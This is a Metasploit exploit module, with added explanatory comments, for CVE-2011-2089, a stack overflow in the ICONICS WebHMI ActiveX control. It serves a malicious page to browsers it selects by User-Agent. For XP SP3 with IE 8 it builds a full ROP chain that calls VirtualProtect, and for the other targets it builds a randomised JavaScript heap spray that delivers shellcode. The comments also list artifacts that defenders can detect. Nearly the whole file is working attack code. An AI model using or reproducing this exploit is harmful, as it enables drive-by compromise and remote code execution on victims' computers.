##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Browser-side exploit for CVE-2011-2089: a stack buffer overflow in the
# ICONICS WebHMI ActiveX control (GenVersion.dll) reached through its
# SetActiveXGUID method. The module runs as an HTTP server and answers every
# request with one HTML page that instantiates the control by CLSID and calls
# SetActiveXGUID with an oversized, %u-escaped string.
#
# Target selection is done per request from the User-Agent header (see
# #on_request_uri), not from the TARGET option; the 'Automatic' entry is
# therefore never used directly. A target without a 'spraySize' key gets the
# fixed ROP chain (gadget addresses documented inline as XP SP3 / IE 8); any
# other target gets a JavaScript heap spray aimed at its 'Ret' value.
#
# Artifacts a defender can key on in the served page: an <object> tag with
# clsid D25FCAFC-F795-4609-89BB-5F78B4ACAF2C, a SetActiveXGUID(...) call on an
# unescape()'d string of several thousand characters, and 3-8 character
# random alphabetic names for every element id and JavaScript identifier.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  # Module metadata. Per-target keys read by #on_request_uri:
  #   'Offset'    - bytes of filler before the ROP chain (ROP target only)
  #   'Ret'       - first gadget (ROP target) or spray address (spray target)
  #   'Max'       - length the escaped exploit string is padded or built to
  #   'blockSize' - JS loop bound for growing one spray block (emitted as a JS literal)
  #   'spraySize' - JS loop bound for the number of spray blocks; its presence
  #                 is what selects the spray path
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "ICONICS WebHMI ActiveX Buffer Overflow",
        'Description' => %q{
          This module exploits a vulnerability found in ICONICS WebHMI's ActiveX control.
          By supplying a long string of data to the 'SetActiveXGUID' parameter, GenVersion.dll
          fails to do any proper bounds checking before this input is copied onto the stack,
          which causes a buffer overflow, and results arbitrary code execution under the context
          of the user.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Scoot Bell <scott.bell[at]security-assessment.com>',
          'Blair Strang <blair.strang[at]security-assessment.com>',
          'sinn3r', # Metasploit port
        ],
        'References' => [
          ['CVE', '2011-2089'],
          ['OSVDB', '72135'],
          ['URL', 'http://www.security-assessment.com/files/documents/advisory/ICONICS_WebHMI.pdf'],
          ['EDB', '17240'],
          ['URL', 'https://www.cisa.gov/uscert/ics/alerts/ICS-ALERT-11-080-02']
        ],
        'Payload' => {
          'BadChars' => "\x00",
          'StackAdjustment' => -3500,
        },
        'DefaultOptions' => {
          'EXITFUNC' => "seh",
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
        },
        'Platform' => 'win',
        'Targets' => [
          [
            'Automatic', {}
          ],
          [
            'IE 6/7/8 on Windows XP SP3',
            {
              'Offset' => 510, # Offset to where ROP gadgets begin
              'Ret' => 0x770167b0, # PUSH ESP; POP EBP; RETN 8
              'Max' => 4500, # Max buffer size used
            },
          ],
          [
            'IE 7 on Windows Vista',
            {
              'Ret' => 0x0c0c0c0c, # Target spray
              'blockSize' => "0x1000",
              'spraySize' => "0x8500",
              'Max' => 4500,
            },
          ],
        ],
        'Privileged' => false,
        'DisclosureDate' => '2011-05-05',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Random 32-bit unsigned integer built from 4 random bytes (unpack("L") is
  # native byte order). Used as a don't-care filler dword in the ROP chain.
  def junk
    return rand_text(4).unpack("L")[0].to_i
  end

  # Array holding +addr+ repeated +rep+ times (same as Array.new(rep, addr));
  # used to emit runs of the same gadget address.
  #
  # @param addr [Integer] value to repeat
  # @param rep  [Integer] number of copies
  # @return [Array<Integer>]
  def repeat(addr, rep)
    arr = []
    rep.times { arr << addr }
    return arr
  end

  # HTTP handler: picks a target from the User-Agent, builds the exploit page
  # for it and sends it. The requested URI is ignored.
  #
  # @param cli     client connection handed to send_response / send_not_found
  # @param request incoming request; only its User-Agent header is consulted
  # @return [nil]
  #
  # Requests with an unrecognised User-Agent receive a 404 and an error line
  # is printed; nothing else is logged for them.
  def on_request_uri(cli, request)
    my_target = ''
    agent = request.headers['User-Agent']

    # Browser/OS fingerprint from the User-Agent. targets[1] is the ROP target
    # (XP SP3 + IE 8), targets[2] the heap-spray target. XP with IE 6/7 is also
    # routed to the spray target - presumably because the spray does not depend
    # on OS-specific gadget addresses; confirm against the advisory.
    if agent =~ /NT 5\.1/ and agent =~ /MSIE (6|7)\.\d/
      my_target = targets[2]
    elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7\.\d/
      my_target = targets[2]
    elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/
      my_target = targets[1]
    else
      send_not_found(cli)
      print_error("Unknown User-Agent")
      return
    end

    # js is the optional <head> script (only the spray path fills it);
    # sploit is the %u-escaped string handed to SetActiveXGUID.
    js = ''
    sploit = ''

    if my_target['spraySize'] == nil

      # ROP tekniq is only used against IE 8 + XP SP3 (ENG), since the gadgets are specific
      # to the service pack (non or fully patched)

      # Per the inline comments, the chain writes VirtualProtect's arguments
      # onto the stack and then pivots into the shellcode that follows it.
      # Every gadget address below is fixed for that one OS/browser build.
      rop_gadgets = [
        my_target.ret,
        junk,
        0x7e45c67f, # XCHG EAX,EBP; RETN (USER32.dll)
        repeat(junk, 2),
        0x7e440639, # ADD ESP,10; POP EDI; POP ESI; POP EBX; RETN USER32.dll
        0x7c801ad4, # Kernel32.VirtualProtect
        junk, # Initial ESP + 8 p1 = retaddr
        junk, # p2 - lpaddr
        junk, # p3 - size
        junk, # p4 - perms
        junk, # p5 - oldperms
        junk,
        # Return address
        0x7e4462ed, # XCHG EAX,ECX; RETN (USER32.dll)
        0x7c902b50, # MOV EDX, ECX; RETN (ntdll.dll)
        repeat(0x77aa2d96, 20), # INC ECX * 20 (CRYPT32.dll)
        0x7c901726, # MOV EAX, EDX; RETN (ntdll.dll)
        repeat(0x5b86a17b, 2), # ADD EAX,7B; RETN * 2 (NETAPI32.dll)
        repeat(0x77c34fbd, 2), # ADD EAX,5C; RETN * 2 (msvcrt.dll)
        0x7E76EA74, # MOV DWORD PTR DS:[ECX],EAX; RETN (SXS.dll)
        # Shellcode pointer
        repeat(0x77aa2d96, 4), # INC ECX * 4 (CRYPT32.dll)
        0x7E76EA74, # MOV DWORD PTR DS:[ECX],EAX; RETN (SXS.dll)
        # Size (0x400 bytes)
        repeat(0x77aa2d96, 4), # INC ECX * 4 (CRYPT32.dll)
        0x7e721a99, # POP EAX; RETN (SXS.dll)
        0x3BFFF9CB, # Value to XOR
        0x7e7560b5, # XOR EAX,3bfffdcb (SXS.dll)
        0x7E76EA74, # MOV DWORD PTR DS:[ECX],EAX; RETN (RPCRT4.dll)
        # NewProtect
        repeat(0x77aa2d96, 4), # INC ECX * 4 (CRYPT32.dll)
        0x7E456160, # XOR EAX,EAX; RETN (USER32.dll)
        0x7E4193BA, # ADD AL,3B (USER32.dll)
        repeat(0x7E442074, 5), # INC EAX; RETN (USER32.dll)
        0x7E76EA74, # MOV DWORD PTR DS:[ECX],EAX; RETN (USER32.dll)
        # OldProtect
        repeat(0x77aa2d96, 4), # INC ECX * 4 (CRYPT32.dll)
        0x7e721a99, # POP EAX (SXS.dll)
        0x10010570, # EAX (Writable memory)
        0x7E76EA74, # MOV DWORD PTR DS:[ECX],EAX; RETN (USER32.dll)
        # Call VirtualProtect
        repeat(0x7E421AAF, 20), # DEC ECX; RETN (USER32.dll)
        0x7E4462ED, # XCHG EAX,ECX; RETN (USER32.dll)
        0x7E45F257, # XCHG EAX,ESP; RETN (USER32.dll)
        repeat(junk, 2), # Align shellcode
      ].flatten.pack('V*')

      # Layout: Offset bytes of filler, ROP chain, 80 NOPs, payload, then
      # alpha padding up to 'Max'. Each piece is %u-escaped so the page's
      # unescape() turns it back into raw bytes.
      # NOTE(review): the endianness lookup uses `target` (the TARGET option's
      # selection, default 'Automatic'), not my_target - harmless only while
      # all targets resolve to the same arch.
      sploit << Rex::Text.to_unescape(rand_text_alpha(my_target['Offset']), Rex::Arch.endian(target.arch))
      sploit << Rex::Text.to_unescape(rop_gadgets, Rex::Arch.endian(target.arch))
      sploit << Rex::Text.to_unescape(make_nops(80), Rex::Arch.endian(target.arch))
      sploit << Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
      # NOTE(review): sploit.length here is the escaped length (6 chars per
      # 2 bytes), so 'Max' bounds the escaped text, not the decoded bytes; with
      # a large payload the difference can reach zero or go negative - confirm
      # rand_text_alpha tolerates that.
      sploit << rand_text_alpha(my_target['Max'] - sploit.length)

    else

      # If we don't have to ROP, then we just spray against the rest of the targets

      # 'nops' is not a NOP sled but four copies of the spray address; the JS
      # below doubles it until it reaches 'blockSize'. The string passed to
      # SetActiveXGUID on this path is 'Max'/4 copies of the same address.
      shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
      target_ret = [my_target.ret].pack('V')
      nops = Rex::Text.to_unescape(target_ret * 4, Rex::Arch.endian(target.arch))
      sploit << Rex::Text.to_unescape(target_ret * (my_target['Max'] / 4), Rex::Arch.endian(target.arch))

      # Randomised identifiers (3-8 alpha chars) so the script has no fixed names.
      js_func_name = rand_text_alpha(rand(6) + 3)
      js_var_blocks_name = rand_text_alpha(rand(6) + 3)
      js_var_shell_name = rand_text_alpha(rand(6) + 3)
      js_var_nopsled_name = rand_text_alpha(rand(6) + 3)
      js_var_index_name = rand_text_alpha(rand(6) + 3)

      # blockSize / spraySize are interpolated verbatim as JS numeric literals.
      js = <<-EOS
    <script>
    function #{js_func_name}() {
    var #{js_var_blocks_name} = new Array();
    var #{js_var_shell_name} = unescape("#{shellcode}");
    var #{js_var_nopsled_name} = unescape("#{nops}");
    while (#{js_var_nopsled_name}.length < #{my_target['blockSize']}) { #{js_var_nopsled_name} += #{js_var_nopsled_name} };
    for (var #{js_var_index_name}=0; #{js_var_index_name} < #{my_target['spraySize']}; #{js_var_index_name}++) {
    #{js_var_blocks_name}[#{js_var_index_name}] = [ "" + #{js_var_nopsled_name} + #{js_var_shell_name} ].join("");
    }
    }
    #{js_func_name}();
    </script>
      EOS

    end

    obj_id = rand_text_alpha(rand(6) + 3)
    sploit_name = rand_text_alpha(rand(6) + 3)

    # The page: optional spray script in <head>, the vulnerable control
    # instantiated by CLSID, and the SetActiveXGUID call on the decoded string.
    html = <<-EOS
    <html>
    <head>#{js}</head>
    <body>
    <object classid="clsid:D25FCAFC-F795-4609-89BB-5F78B4ACAF2C" id="#{obj_id}"></object>
    <script>
    var #{sploit_name} = unescape("#{sploit}");
    #{obj_id}.SetActiveXGUID(#{sploit_name});
    </script>
    </body>
    </html>
    EOS

    # Strip the four-space heredoc indentation from every line of the page.
    html = html.gsub(/^ {4}/, "")

    print_status("Sending malicious page")
    send_response(cli, html, { 'Content-Type' => 'text/html' })
  end
end